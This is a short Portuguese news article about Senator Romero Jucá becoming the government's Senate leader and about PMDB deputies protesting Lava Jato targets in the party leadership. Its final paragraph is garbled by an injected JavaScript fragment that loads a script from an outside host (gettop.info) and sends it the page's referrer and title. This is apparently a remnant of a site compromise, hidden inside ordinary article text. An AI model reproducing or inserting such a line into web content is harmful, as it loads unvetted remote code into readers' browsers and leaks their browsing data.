Jucá será líder do governo no Senado

Jucá é investigado pela Operação Lava Jato. Foto: Agência Senado

O senador Romero Jucá (PMDB-RR) vai assumir a liderança do governo no Senado e o deputado André Moura (PSC-SE) foi confirmado pelo Palácio do Planalto para ocupar a vaga de Jucá como líder do governo no Congresso Nacional. As mudanças foram negociadas nos últimos dias e fechadas nesse sábado (4), após conversas do presidente Michel Temer com os parlamentares.

André Moura, que era líder do governo na Câmara, deixou há duas semanas o posto. Em seu lugar, assumiu o também deputado Aguinaldo Ribeiro (PP-PB). Já o senador Romero Jucá substituirá Aloysio Nunes (PSDB-SP), que foi nomeado por Temer ministro das Relações Exteriores.

Segundo a Folha de S.Paulo, dizendo-se irritado com a condução que Jucá vem dando ao partido, um grupo de deputados da legenda redigiu um documento em que exige o afastamento de alvos da Operação Lava Jato do comando da legenda.

Investigado na operação, Jucá preside o PMDB desde abril de 2016, quando Temer licenciou-se do comando da sigla.  Os parlamentares também ameaçam uma debandada em massa durante a janela partidária que antecede as eleições do ano que vem. Uma “Carta ao PMDB” será entregue a Jucá na quarta (8), data da reunião da Executiva Nacional do partido.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário